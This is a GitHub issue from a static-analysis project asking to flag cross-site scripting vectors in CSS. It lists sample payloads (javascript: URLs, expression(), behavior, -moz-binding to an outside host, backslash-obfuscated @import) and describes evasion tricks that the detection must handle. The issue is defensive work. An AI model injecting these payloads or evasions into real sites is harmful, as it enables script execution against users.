Skip to content
This repository has been archived by the owner on Jul 20, 2018. It is now read-only.

Flag common XSS vectors in CSS and CSS files #255

Open
nickdaugherty opened this issue Mar 20, 2015 · 0 comments
Open

Flag common XSS vectors in CSS and CSS files #255

nickdaugherty opened this issue Mar 20, 2015 · 0 comments
Labels
enhancement static analysis

Comments

@nickdaugherty
Copy link
Contributor

XSS can come from CSS:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<style>body{-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)}</style>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<DIV STYLE="width: expression(alert('XSS'));">
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

<XSS STYLE="behavior: url(xss.htc);">

In external and inline CSS, we should block:

  • <link> with href set to JS
  • style urls (like background) consisting of JS
  • usage of expression and behavior
  • @import set to JS

Note that comments in the CSS style can break normal detection - so we need to strip comments from the source first. Also, the word javascript can be broken up with slashes in some cases, which can defeat basic scanning.

Browser support for some of these is limited, but it's still worth catching.

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
@nickdaugherty nickdaugherty changed the title Flag common XSS vectors in CSS files Flag common XSS vectors in CSS and CSS files Mar 25, 2015
This was referenced Mar 27, 2015
Open
Closed
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
enhancement static analysis
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@nickdaugherty